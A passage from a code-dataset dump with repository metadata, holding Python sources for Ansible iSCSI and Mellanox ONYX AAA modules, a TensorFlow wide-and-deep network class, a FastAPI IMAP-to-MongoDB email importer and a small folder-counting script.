cmd = '%s --mode node --targetname %s --op=update --name node.startup --value manual' % (iscsiadm_cmd, target)\n (rc, out, err) = module.run_command(cmd)\n\n if rc > 0:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef main():\n # load ansible module object\n module = AnsibleModule(\n argument_spec=dict(\n\n # target\n portal=dict(type='str', aliases=['ip']),\n port=dict(type='str', default='3260'),\n target=dict(type='str', aliases=['name', 'targetname']),\n node_auth=dict(type='str', default='CHAP'),\n node_user=dict(type='str'),\n node_pass=dict(type='str', no_log=True),\n\n # actions\n login=dict(type='bool', aliases=['state']),\n 
auto_node_startup=dict(type='bool', aliases=['automatic']),\n discover=dict(type='bool', default=False),\n show_nodes=dict(type='bool', default=False),\n ),\n\n required_together=[['discover_user', 'discover_pass'],\n ['node_user', 'node_pass']],\n supports_check_mode=True,\n )\n\n global iscsiadm_cmd\n iscsiadm_cmd = module.get_bin_path('iscsiadm', required=True)\n\n # parameters\n portal = module.params['portal']\n target = module.params['target']\n port = module.params['port']\n login = module.params['login']\n automatic = module.params['auto_node_startup']\n discover = module.params['discover']\n show_nodes = module.params['show_nodes']\n\n check = module.check_mode\n\n cached = iscsi_get_cached_nodes(module, portal)\n\n # return json dict\n result = {}\n result['changed'] = False\n\n if discover:\n if portal is None:\n module.fail_json(msg=\"Need to specify at least the portal (ip) to discover\")\n elif check:\n nodes = cached\n else:\n iscsi_discover(module, portal, port)\n nodes = iscsi_get_cached_nodes(module, portal)\n if not compare_nodelists(cached, nodes):\n result['changed'] |= True\n result['cache_updated'] = True\n else:\n nodes = cached\n\n if login is not None or automatic is not None:\n if target is None:\n if len(nodes) > 1:\n module.fail_json(msg=\"Need to specify a target\")\n else:\n target = nodes[0]\n else:\n # check given target is in cache\n check_target = False\n for node in nodes:\n if node == target:\n check_target = True\n break\n if not check_target:\n module.fail_json(msg=\"Specified target not found\")\n\n if show_nodes:\n result['nodes'] = nodes\n\n if login is not None:\n loggedon = target_loggedon(module, target)\n if (login and loggedon) or (not login and not loggedon):\n result['changed'] |= False\n if login:\n result['devicenodes'] = target_device_node(module, target)\n elif not check:\n if login:\n target_login(module, target, portal, port)\n # give udev some time\n time.sleep(1)\n result['devicenodes'] = 
target_device_node(module, target)\n else:\n target_logout(module, target)\n result['changed'] |= True\n result['connection_changed'] = True\n else:\n result['changed'] |= True\n result['connection_changed'] = True\n\n if automatic is not None:\n isauto = target_isauto(module, target)\n if (automatic and isauto) or (not automatic and not isauto):\n result['changed'] |= False\n result['automatic_changed'] = False\n elif not check:\n if automatic:\n target_setauto(module, target)\n else:\n target_setmanual(module, target)\n result['changed'] |= True\n result['automatic_changed'] = True\n else:\n result['changed'] |= True\n result['automatic_changed'] = True\n\n module.exit_json(**result)\n\n\nif __name__ == '__main__':\n main()\n"},"avg_line_length":{"kind":"number","value":31.1284153005,"string":"31.128415"},"max_line_length":{"kind":"number","value":121,"string":"121"},"alphanum_fraction":{"kind":"number","value":0.5981743176,"string":"0.598174"}}},{"rowIdx":46366,"cells":{"hexsha":{"kind":"string","value":"4306437305398fdfa56682cb39fae32e02b7acb6"},"size":{"kind":"number","value":15271,"string":"15,271"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"_Dist/NeuralNetworks/e_AdvancedNN/DistNN.py"},"max_stars_repo_name":{"kind":"string","value":"leoatchina/MachineLearning"},"max_stars_repo_head_hexsha":{"kind":"string","value":"071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1107,"string":"1,107"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2016-09-21T02:18:36.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-29T02:52:12.000Z"},"max_issues_repo_path":{"kind":"string","value":"_Dist/NeuralNetworks/e_AdvancedNN/DistNN.py"},"max_issues_repo_name":{"kind":"string","value":"leoatchina/MachineLearning"},"max_issues_repo_head_hexsha":{"kind":"string","value":"071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":18,"string":"18"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2016-12-22T10:24:47.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-03-11T23:18:43.000Z"},"max_forks_repo_path":{"kind":"string","value":"_Dist/NeuralNetworks/e_AdvancedNN/DistNN.py"},"max_forks_repo_name":{"kind":"string","value":"leoatchina/MachineLearning"},"max_forks_repo_head_hexsha":{"kind":"string","value":"071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":776,"string":"776"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2016-12-21T12:08:08.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-21T06:12:08.000Z"},"content":{"kind":"string","value":"import os\nimport sys\nroot_path = os.path.abspath(\"../../../\")\nif root_path not in sys.path:\n sys.path.append(root_path)\n\nimport math\nimport numpy as np\nimport tensorflow as tf\n\nfrom _Dist.NeuralNetworks.NNUtil import *\nfrom _Dist.NeuralNetworks.c_BasicNN.DistNN import Basic\n\n\nclass Advanced(Basic):\n signature = \"Advanced\"\n\n def __init__(self, name=None, data_info=None, model_param_settings=None, model_structure_settings=None):\n 
self.tf_list_collections = None\n super(Advanced, self).__init__(name, model_param_settings, model_structure_settings)\n self._name_appendix = \"Advanced\"\n\n if data_info is None:\n self.data_info = {}\n else:\n assert_msg = \"data_info should be a dictionary\"\n assert isinstance(data_info, dict), assert_msg\n self.data_info = data_info\n self._data_info_initialized = False\n self.numerical_idx = self.categorical_columns = None\n\n self._deep_input = self._wide_input = None\n self._categorical_xs = None\n self.embedding_size = None\n self._embedding = self._one_hot = self._embedding_concat = self._one_hot_concat = None\n self._embedding_with_one_hot = self._embedding_with_one_hot_concat = None\n\n self.dropout_keep_prob = self.use_batch_norm = None\n self._use_wide_network = self._dndf = self._pruner = self._dndf_pruner = None\n\n self._tf_p_keep = None\n self._n_batch_placeholder = None\n\n @property\n def valid_numerical_idx(self):\n return np.array([\n is_numerical for is_numerical in self.numerical_idx\n if is_numerical is not None\n ])\n\n def init_data_info(self):\n if self._data_info_initialized:\n return\n self._data_info_initialized = True\n self.numerical_idx = self.data_info.get(\"numerical_idx\", None)\n self.categorical_columns = self.data_info.get(\"categorical_columns\", None)\n if self.numerical_idx is None:\n raise ValueError(\"numerical_idx should be provided\")\n if self.categorical_columns is None:\n raise ValueError(\"categorical_columns should be provided\")\n\n def init_from_data(self, x, y, x_test, y_test, sample_weights, names):\n self.init_data_info()\n super(Advanced, self).init_from_data(x, y, x_test, y_test, sample_weights, names)\n if len(self.valid_numerical_idx) != self.n_dim + 1:\n raise ValueError(\"Length of valid_numerical_idx should be {}, {} found\".format(\n self.n_dim + 1, len(self.valid_numerical_idx)\n ))\n self.n_dim -= len(self.categorical_columns)\n self.model_structure_settings.setdefault(\"use_wide_network\", 
self.n_dim > 0)\n\n def init_model_param_settings(self):\n super(Advanced, self).init_model_param_settings()\n self.dropout_keep_prob = float(self.model_param_settings.get(\"keep_prob\", 0.5))\n self.use_batch_norm = self.model_param_settings.get(\"use_batch_norm\", False)\n\n def init_model_structure_settings(self):\n self.hidden_units = self.model_structure_settings.get(\"hidden_units\", None)\n self._deep_input = self.model_structure_settings.get(\"deep_input\", \"embedding_concat\")\n self._wide_input = self.model_structure_settings.get(\"wide_input\", \"continuous\")\n self.embedding_size = self.model_structure_settings.get(\"embedding_size\", 8)\n\n self._use_wide_network = self.model_structure_settings[\"use_wide_network\"]\n if not self._use_wide_network:\n self._dndf = None\n else:\n dndf_params = self.model_structure_settings.get(\"dndf_params\", {})\n if self.model_structure_settings.get(\"use_dndf\", True):\n self._dndf = DNDF(self.n_class, **dndf_params)\n if self.model_structure_settings.get(\"use_pruner\", True):\n pruner_params = self.model_structure_settings.get(\"pruner_params\", {})\n self._pruner = Pruner(**pruner_params)\n if self.model_structure_settings.get(\"use_dndf_pruner\", False):\n dndf_pruner_params = self.model_structure_settings.get(\"dndf_pruner_params\", {})\n self._dndf_pruner = Pruner(**dndf_pruner_params)\n\n def _get_embedding(self, i, n):\n embedding_size = math.ceil(math.log2(n)) + 1 if self.embedding_size == \"log\" else self.embedding_size\n embedding = tf.Variable(tf.truncated_normal(\n [n, embedding_size], mean=0, stddev=0.02\n ), name=\"Embedding{}\".format(i))\n return tf.nn.embedding_lookup(embedding, self._categorical_xs[i], name=\"Embedded_X{}\".format(i))\n\n def _define_hidden_units(self):\n n_data = len(self._train_generator)\n current_units = self._deep_input.shape[1].value\n if current_units > 512:\n self.hidden_units = [1024, 1024]\n elif current_units > 256:\n if n_data >= 10000:\n self.hidden_units = [1024, 
1024]\n else:\n self.hidden_units = [2 * current_units, 2 * current_units]\n else:\n if n_data >= 100000:\n self.hidden_units = [768, 768]\n elif n_data >= 10000:\n self.hidden_units = [512, 512]\n else:\n self.hidden_units = [2 * current_units, 2 * current_units]\n\n def _fully_connected_linear(self, net, shape, appendix):\n with tf.name_scope(\"Linear{}\".format(appendix)):\n w = init_w(shape, \"W{}\".format(appendix))\n if self._pruner is not None:\n w = self._pruner.prune_w(*self._pruner.get_w_info(w))\n b = init_b([shape[1]], \"b{}\".format(appendix))\n self._ws.append(w)\n self._bs.append(b)\n return tf.add(tf.matmul(net, w), b, name=\"Linear{}_Output\".format(appendix))\n\n def _build_layer(self, i, net):\n if self.use_batch_norm:\n net = tf.layers.batch_normalization(net, training=self._is_training, name=\"BN{}\".format(i))\n activation = self.activations[i]\n if activation is not None:\n net = getattr(Activations, activation)(net, \"{}{}\".format(activation, i))\n if self.dropout_keep_prob < 1:\n net = tf.nn.dropout(net, keep_prob=self._tf_p_keep)\n return net\n\n def _build_model(self, net=None):\n super(Advanced, self)._build_model(self._deep_input)\n if self._use_wide_network:\n if self._dndf is None:\n wide_output = self._fully_connected_linear(\n self._wide_input, appendix=\"_wide_output\",\n shape=[self._wide_input.shape[1].value, self.n_class]\n )\n else:\n wide_output = self._dndf(\n self._wide_input, self._n_batch_placeholder,\n pruner=self._dndf_pruner\n )\n self._output += wide_output\n\n def _get_feed_dict(self, x, y=None, weights=None, is_training=True):\n continuous_x = x[..., self.valid_numerical_idx[:-1]] if self._categorical_xs else x\n feed_dict = super(Advanced, self)._get_feed_dict(continuous_x, y, weights, is_training)\n if self._dndf is not None:\n feed_dict[self._n_batch_placeholder] = len(x)\n if self._pruner is not None:\n cond_placeholder = self._pruner.cond_placeholder\n if cond_placeholder is not None:\n 
feed_dict[cond_placeholder] = True\n if self._dndf is not None and self._dndf_pruner is not None:\n cond_placeholder = self._dndf_pruner.cond_placeholder\n if cond_placeholder is not None:\n feed_dict[cond_placeholder] = True\n for (idx, _), categorical_x in zip(self.categorical_columns, self._categorical_xs):\n feed_dict.update({categorical_x: x[..., idx].astype(np.int32)})\n return feed_dict\n\n def _define_input_and_placeholder(self):\n super(Advanced, self)._define_input_and_placeholder()\n if not self.categorical_columns:\n self._categorical_xs = []\n self._one_hot = self._one_hot_concat = self._tfx\n self._embedding = self._embedding_concat = self._tfx\n self._embedding_with_one_hot = self._embedding_with_one_hot_concat = self._tfx\n else:\n all_categorical = self.n_dim == 0\n with tf.name_scope(\"Categorical_Xs\"):\n self._categorical_xs = [\n tf.placeholder(tf.int32, shape=[None], name=\"Categorical_X{}\".format(i))\n for i in range(len(self.categorical_columns))\n ]\n with tf.name_scope(\"One_hot\"):\n one_hot_vars = [\n tf.one_hot(self._categorical_xs[i], n)\n for i, (_, n) in enumerate(self.categorical_columns)\n ]\n self._one_hot = self._one_hot_concat = tf.concat(one_hot_vars, 1, name=\"Raw\")\n if not all_categorical:\n self._one_hot_concat = tf.concat([self._tfx, self._one_hot], 1, name=\"Concat\")\n with tf.name_scope(\"Embedding\"):\n embeddings = [\n self._get_embedding(i, n)\n for i, (_, n) in enumerate(self.categorical_columns)\n ]\n self._embedding = self._embedding_concat = tf.concat(embeddings, 1, name=\"Raw\")\n if not all_categorical:\n self._embedding_concat = tf.concat([self._tfx, self._embedding], 1, name=\"Concat\")\n with tf.name_scope(\"Embedding_with_one_hot\"):\n self._embedding_with_one_hot = self._embedding_with_one_hot_concat = tf.concat(\n embeddings + one_hot_vars, 1, name=\"Raw\"\n )\n if not all_categorical:\n self._embedding_with_one_hot_concat = tf.concat(\n [self._tfx, self._embedding_with_one_hot], 1, name=\"Concat\"\n 
)\n if self._wide_input == \"continuous\":\n self._wide_input = self._tfx\n else:\n self._wide_input = getattr(self, \"_\" + self._wide_input)\n if self._deep_input == \"continuous\":\n self._deep_input = self._tfx\n else:\n self._deep_input = getattr(self, \"_\" + self._deep_input)\n if self.hidden_units is None:\n self._define_hidden_units()\n self._tf_p_keep = tf.cond(\n self._is_training, lambda: self.dropout_keep_prob, lambda: 1.,\n name=\"keep_prob\"\n )\n self._n_batch_placeholder = tf.placeholder(tf.int32, name=\"n_batch\")\n\n def _define_py_collections(self):\n super(Advanced, self)._define_py_collections()\n self.py_collections += [\"data_info\", \"numerical_idx\", \"categorical_columns\"]\n\n def _define_tf_collections(self):\n super(Advanced, self)._define_tf_collections()\n self.tf_collections += [\n \"_deep_input\", \"_wide_input\", \"_n_batch_placeholder\",\n \"_embedding\", \"_one_hot\", \"_embedding_with_one_hot\",\n \"_embedding_concat\", \"_one_hot_concat\", \"_embedding_with_one_hot_concat\"\n ]\n self.tf_list_collections = [\"_categorical_xs\"]\n\n def add_tf_collections(self):\n super(Advanced, self).add_tf_collections()\n for tf_list in self.tf_list_collections:\n target_list = getattr(self, tf_list)\n if target_list is None:\n continue\n for tensor in target_list:\n tf.add_to_collection(tf_list, tensor)\n\n def restore_collections(self, folder):\n for tf_list in self.tf_list_collections:\n if tf_list is not None:\n setattr(self, tf_list, tf.get_collection(tf_list))\n super(Advanced, self).restore_collections(folder)\n\n def clear_tf_collections(self):\n super(Advanced, self).clear_tf_collections()\n for key in self.tf_list_collections:\n tf.get_collection_ref(key).clear()\n\n def print_settings(self, only_return=False):\n msg = \"\\n\".join([\n \"=\" * 100, \"This is a {}\".format(\n \"{}-classes problem\".format(self.n_class) if not self.n_class == 1\n else \"regression problem\"\n ), \"-\" * 100,\n \"Data : {} training samples, {} test 
samples\".format(\n len(self._train_generator), len(self._test_generator) if self._test_generator is not None else 0\n ),\n \"Features : {} categorical, {} numerical\".format(\n len(self.categorical_columns), np.sum(self.valid_numerical_idx)\n )\n ]) + \"\\n\"\n\n msg += \"=\" * 100 + \"\\n\"\n msg += \"Deep model: DNN\\n\"\n msg += \"Deep model input: {}\\n\".format(\n \"Continuous features only\" if not self.categorical_columns else\n \"Continuous features with embeddings\" if np.any(self.numerical_idx) else\n \"Embeddings only\"\n )\n msg += \"-\" * 100 + \"\\n\"\n if self.categorical_columns:\n msg += \"Embedding size: {}\\n\".format(self.embedding_size)\n msg += \"Actual feature dimension: {}\\n\".format(self._embedding_concat.shape[1].value)\n msg += \"-\" * 100 + \"\\n\"\n if self.dropout_keep_prob < 1:\n msg += \"Using dropout with keep_prob = {}\\n\".format(self.dropout_keep_prob)\n else:\n msg += \"Training without dropout\\n\"\n msg += \"Training {} batch norm\\n\".format(\"with\" if self.use_batch_norm else \"without\")\n msg += \"Hidden units: {}\\n\".format(self.hidden_units)\n\n msg += \"=\" * 100 + \"\\n\"\n if not self._use_wide_network:\n msg += \"Wide model: None\\n\"\n else:\n msg += \"Wide model: {}\\n\".format(\"logistic regression\" if self._dndf is None else \"DNDF\")\n msg += \"Wide model input: Continuous features only\\n\"\n msg += \"-\" * 100 + '\\n'\n if self._dndf is not None:\n msg += \"Using DNDF with n_tree = {}, tree_depth = {}\\n\".format(\n self._dndf.n_tree, self._dndf.tree_depth\n )\n\n msg += \"\\n\".join([\"=\" * 100, \"Hyper parameters\", \"-\" * 100, \"{}\".format(\n \"This is a DNN model\" if self._dndf is None and not self._use_wide_network else\n \"This is a Wide & Deep model\" if self._dndf is None else\n \"This is a hybrid model\"\n ), \"-\" * 100]) + \"\\n\"\n msg += \"Activation : \" + str(self.activations) + \"\\n\"\n msg += \"Batch size : \" + str(self.batch_size) + \"\\n\"\n msg += \"Epoch num : \" + 
str(self.n_epoch) + \"\\n\"\n msg += \"Optimizer : \" + self._optimizer_name + \"\\n\"\n msg += \"Metric : \" + self._metric_name + \"\\n\"\n msg += \"Loss : \" + self._loss_name + \"\\n\"\n msg += \"lr : \" + str(self.lr) + \"\\n\"\n msg += \"-\" * 100 + \"\\n\"\n msg += \"Pruner : {}\".format(\"None\" if self._pruner is None else \"\") + \"\\n\"\n if self._pruner is not None:\n msg += \"\\n\".join(\"-> {:14}: {}\".format(key, value) for key, value in sorted(\n self._pruner.params.items()\n )) + \"\\n\"\n msg += \"-\" * 100\n return msg if only_return else self.log_msg(\n \"\\n\" + msg, logger=self.get_logger(\"print_settings\", \"general.log\"))\n"},"avg_line_length":{"kind":"number","value":46.7003058104,"string":"46.700306"},"max_line_length":{"kind":"number","value":112,"string":"112"},"alphanum_fraction":{"kind":"number","value":0.6034313404,"string":"0.603431"}}},{"rowIdx":46367,"cells":{"hexsha":{"kind":"string","value":"60cc8fde5298eb8b2ba7eb219e5f4d8541b683fd"},"size":{"kind":"number","value":4515,"string":"4,515"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"import-emails-api-docker/main.py"},"max_stars_repo_name":{"kind":"string","value":"Zeno-Paukner/cellarius"},"max_stars_repo_head_hexsha":{"kind":"string","value":"904b88c6dc33cf4ec2f6d70d3e1acf175b11967a"},"max_stars_repo_licenses":{"kind":"list like","value":["Unlicense"],"string":"[\n 
\"Unlicense\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-12-06T20:29:28.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-12-06T20:29:28.000Z"},"max_issues_repo_path":{"kind":"string","value":"import-emails-api-docker/main.py"},"max_issues_repo_name":{"kind":"string","value":"Zeno-Paukner/cellarius"},"max_issues_repo_head_hexsha":{"kind":"string","value":"904b88c6dc33cf4ec2f6d70d3e1acf175b11967a"},"max_issues_repo_licenses":{"kind":"list like","value":["Unlicense"],"string":"[\n \"Unlicense\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"import-emails-api-docker/main.py"},"max_forks_repo_name":{"kind":"string","value":"Zeno-Paukner/cellarius"},"max_forks_repo_head_hexsha":{"kind":"string","value":"904b88c6dc33cf4ec2f6d70d3e1acf175b11967a"},"max_forks_repo_licenses":{"kind":"list like","value":["Unlicense"],"string":"[\n \"Unlicense\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"import os\nfrom imap_tools import MailBox, AND\nimport pymongo\nfrom pydantic import BaseModel\nfrom fastapi import FastAPI\nfrom bs4 import BeautifulSoup\nimport uvicorn\n\napp = FastAPI()\n#check if rest api is running\n\nprint(\"Rest-Server running\")\n\n# create class ImportEmails with imap_username imap_password imap_server_url mongodb_connection_string collection_name\nclass ImportEmails(BaseModel):\n imap_username: str = os.environ.get('IMAP_PALIDO_USERNAME')\n imap_password: str = os.environ.get('IMAP_PALIDO_EMAIL_PASSWORD')\n imap_server_url: str = os.environ.get('IMAP_PALIDO_SERVER')\n mongodb_connection_string: str = 
os.environ.get('ME_CONFIG_MONGODB_URL')\n collection_name: str = os.environ.get('IMPORT_EMAILS_MONGODB_COLLECTION_NAME')\n\n\n\n \ndef scrape_emails(ImportEmails):\n # create a mongodb connection \n ImportEmails.imap_password = os.environ.get('IMAP_PALIDO_EMAIL_PASSWORD')\n ImportEmails.imap_username = os.environ.get('IMAP_PALIDO_USERNAME')\n ImportEmails.mongodb_connection_string = os.environ.get('ME_CONFIG_MONGODB_URL')\n ImportEmails.collection_name = os.environ.get('IMPORT_EMAILS_MONGODB_COLLECTION_NAME')\n ImportEmails.imap_server_url = os.environ.get('IMAP_PALIDO_SERVER')\n # connect to mongodb\n # if ImportEmails.imap_username == \"username\" then use os.environ.get('IMAP_PALIDO_USERNAME')\n# if ImportEmails.imap_password == \"password\" then use os.environ.get('IMAP_PALIDO_PASSWORD')\n #if(ImportEmails.imap_username == \"username\"):\n # ImportEmails.imap_username = os.environ.get('IMAP_PALIDO_USERNAME')\n #if(ImportEmails.imap_password == \"password\"):\n # ImportEmails.imap_password = os.environ.get('IMAP_PALIDO_PASSWORD')\n myclient = pymongo.MongoClient(ImportEmails.mongodb_connection_string)\n\n #check if mongodb is connected\n if myclient:\n print(\"MongoDB is connected\")\n print(\"Connected with: \" + str(ImportEmails.mongodb_connection_string))\n mydb = myclient[\"Cellarius\"]\n print(\"Connected to MongoDB\")\n # create collection with name collection_name from ImportEmails\n\n # TODO: the collection name is allways \"None\" it should be the name of the ImportEmails.collection_name var\n col = \"imported_emails\"\n\n collection = mydb[col]\n print(\"Open collection :\" + collection.name)\n \n #if the collection allready exists then stop the def\n print(collection.count_documents({}))\n # if the collection has more then one document then stop the def\n if collection.count_documents({}) > 1:\n print(\"Collection has more then one document\")\n return\n\n \n \n # print out current collectionname\n print(\"Collection created:\" + collection.name)\n 
\n\n #print(\"Start scraping emails from:\")\n #print(str(ImportEmails.imap_server_url))\n #print(str(ImportEmails.imap_username))\n mailbox = MailBox(str(ImportEmails.imap_server_url))\n mailbox.login(str(ImportEmails.imap_username), str(ImportEmails.imap_password), initial_folder='INBOX')\n c = 0\n for msg in mailbox.fetch(AND(all=True)):\n\n soup = BeautifulSoup(msg.html, 'html.parser')\n email_texts = soup.get_text().split('Von:')\n email_texts_parsed = []\n for e in email_texts:\n text = (''.join(list(filter(None, e.split('\\n')))))\n email_texts_parsed.append(text)\n\n email_conversation = {\n \"uid\": msg.uid,\n \"subject\": msg.subject,\n \"from\": msg.from_,\n \"to\": msg.to,\n \"html\": msg.html,\n \"email_texts\" : email_texts_parsed,\n \"data_status\": 0\n }\n\n c = c + 1\n x = collection.insert_one(email_conversation)\n print (\"Saved:\", c, msg.uid, msg.subject)\n\n mailbox.logout()\n print(\"Finished scraping emails\")\n\n\n# run ImportEmails scrape_emails\n\n\n#scrape_emails(ImportEmails)\n\n#create a post req to fill class ImportEmails\n@app.post(\"/start-import-emails\")\nasync def import_emails(input: ImportEmails):\n #if the Input is empty fill in the os.environ\n scrape_emails(ImportEmails)\n return \"OK\"\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Hello World\"}\n\n\n#uvicorn.run(app, host=\"0.0.0.0\", port=8000)\nuvicorn.run(app, host=\"0.0.0.0\", port=8000, 
root_path=\"/cellarius/import-emails\")\n\n\n\n\n"},"avg_line_length":{"kind":"number","value":36.4112903226,"string":"36.41129"},"max_line_length":{"kind":"number","value":118,"string":"118"},"alphanum_fraction":{"kind":"number","value":0.6671096346,"string":"0.66711"}}},{"rowIdx":46368,"cells":{"hexsha":{"kind":"string","value":"71e1fc0892b74520084fc5cc7410f69346dd3218"},"size":{"kind":"number","value":479,"string":"479"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"___Python/Thomas/pycurs_180625/p07_file_io/m01_count_files.py"},"max_stars_repo_name":{"kind":"string","value":"uvenil/PythonKurs201806"},"max_stars_repo_head_hexsha":{"kind":"string","value":"85afa9c9515f5dd8bec0c546f077d8cc39568fe8"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"___Python/Thomas/pycurs_180625/p07_file_io/m01_count_files.py"},"max_issues_repo_name":{"kind":"string","value":"uvenil/PythonKurs201806"},"max_issues_repo_head_hexsha":{"kind":"string","value":"85afa9c9515f5dd8bec0c546f077d8cc39568fe8"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"___Python/Thomas/pycurs_180625/p07_file_io/m01_count_files.py"},"max_forks_repo_name":{"kind":"string","value":"uvenil/PythonKurs201806"},"max_forks_repo_head_hexsha":{"kind":"string","value":"85afa9c9515f5dd8bec0c546f077d8cc39568fe8"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n 
\"Apache-2.0\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from pathlib import Path\r\n\r\n# Zähle die Anzahle Ordner in einem Ordner (inkl. Unetrordner)\r\n\r\n\r\ndef count_dirs(path):\r\n try:\r\n subdirs = [subdir for subdir in path.iterdir() if subdir.is_dir()] # Unterordner dieses Verzeichnis\r\n count = 1\r\n for subdir in subdirs:\r\n count += count_dirs(subdir)\r\n return count\r\n except PermissionError:\r\n return 1\r\n\r\ncount = count_dirs(Path(\"O:\\Spielwiese\"))\r\nprint(count)\r\n\r\n#problem interative"},"avg_line_length":{"kind":"number","value":25.2105263158,"string":"25.210526"},"max_line_length":{"kind":"number","value":108,"string":"108"},"alphanum_fraction":{"kind":"number","value":0.643006263,"string":"0.643006"}}},{"rowIdx":46369,"cells":{"hexsha":{"kind":"string","value":"46080f0351429e6f033ebda794d228d6c1c01157"},"size":{"kind":"number","value":5905,"string":"5,905"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/onyx_aaa.py"},"max_stars_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/onyx_aaa.py"},"max_issues_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/onyx_aaa.py"},"max_forks_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"#!/usr/bin/python\n#\n# Copyright: Ansible Project\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\nDOCUMENTATION = '''\n---\nmodule: onyx_aaa\nauthor: \"Sara Touqan (@sarato)\"\nshort_description: Configures AAA parameters\ndescription:\n - This module provides declarative management of AAA protocol params\n on Mellanox ONYX network devices.\noptions:\n 
tacacs_accounting_enabled:\n description:\n - Configures accounting settings.\n type: bool\n auth_default_user:\n description:\n - Sets local user default mapping.\n type: str\n choices: ['admin', 'monitor']\n auth_order:\n description:\n - Sets the order on how to handle remote to local user mappings.\n type: str\n choices: ['local-only', 'remote-first', 'remote-only']\n auth_fallback_enabled:\n description:\n - Enables/Disables fallback server-err option.\n type: bool\n'''\n\nEXAMPLES = \"\"\"\n- name: configures aaa\n onyx_aaa:\n tacacs_accounting_enabled: yes\n auth_default_user: monitor\n auth_order: local-only\n auth_fallback_enabled: false\n\"\"\"\n\nRETURN = \"\"\"\ncommands:\n description: The list of configuration mode commands to send to the device.\n returned: always\n type: list\n sample:\n - aaa accounting changes default stop-only tacacs+\n - no aaa accounting changes default stop-only tacacs+\n - aaa authorization map default-user \n - aaa authorization map order \n - aaa authorization map fallback server-err\n - no aaa authorization map fallback server-err\n\"\"\"\n\nimport re\n\nfrom ansible.module_utils.basic import AnsibleModule\n\nfrom ansible_collections.community.general.plugins.module_utils.network.onyx.onyx import 